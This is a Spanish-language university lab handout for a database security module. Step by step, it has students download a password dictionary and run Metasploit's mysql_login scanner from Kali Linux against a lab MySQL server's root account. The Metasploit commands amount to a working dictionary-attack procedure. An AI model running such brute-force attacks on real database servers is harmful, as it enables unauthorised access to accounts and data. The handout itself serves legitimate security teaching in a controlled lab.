actividad no. 1.9: auditoria de contraseñas en mysql
TRANSCRIPT
Universidad Nacional Autónoma de México Facultad de Contaduría y Administración Diplomado Diseño y Administración de Base de Datos Módulo 6. Seguridad de Bases de Datos
Elaboró: Francisco Medina López 1
Actividad No. 1.9: Auditoria de contraseñas en MySQL Antecedentes Requerimientos Dos equipos de cómputo: Uno con el sistema operativo CentOS que deberá tener configurado el manejador de base de datos MySQL como lo indica la Actividad No. 1.4: Instalación y Configuración de MySQL en CentOS 6 y con la base de datos world creada como lo indica la Actividad No. 1.6: Creación de bases de datos en MySQL. El segundo equipo de cómputo con el sistema operativo Kali Linux con los parámetros de red correctamente configurados como lo indica la Actividad No. 1.2: Introducción a Kali Linux.
Figura No. 1: Modelo cliente-‐servidor
Universidad Nacional Autónoma de México Facultad de Contaduría y Administración Diplomado Diseño y Administración de Base de Datos Módulo 6. Seguridad de Bases de Datos
Elaboró: Francisco Medina López 2
Instrucciones Las siguientes instrucciones deberán ejecutarse desde el sistema operativo Kali Linux:
1. Abre una terminal usando el ícono , ubicado en el panel superior.
2. Descarga el archivo diccionario que será usado más adelante: wget –c http://mod6sbd.capacitacionentics.com/diccionario
3. Inicia los servicios requeridos por el framework de explotación metasploit,
ejecutando los siguientes comandos en una terminal del sistema:
service postgresql start service metasploit start
4. Inicia la consola del framework de explotación metasploit con el comando:
msfconsole
Universidad Nacional Autónoma de México Facultad de Contaduría y Administración Diplomado Diseño y Administración de Base de Datos Módulo 6. Seguridad de Bases de Datos
Elaboró: Francisco Medina López 3
5. Ejecuta los siguientes comandos dentro de metasploit: a. use auxiliary/scanner/mysql/mysql_login
b. show options
c. set RHOSTS 10.211.55.12 d. set USERNAME root e. set PASS_FILE /root/diccionario f. run
Universidad Nacional Autónoma de México Facultad de Contaduría y Administración Diplomado Diseño y Administración de Base de Datos Módulo 6. Seguridad de Bases de Datos
Elaboró: Francisco Medina López 4
6. Después de algunos instantes, metasploit completa el ataque por diccionario a contraseñas de MySQL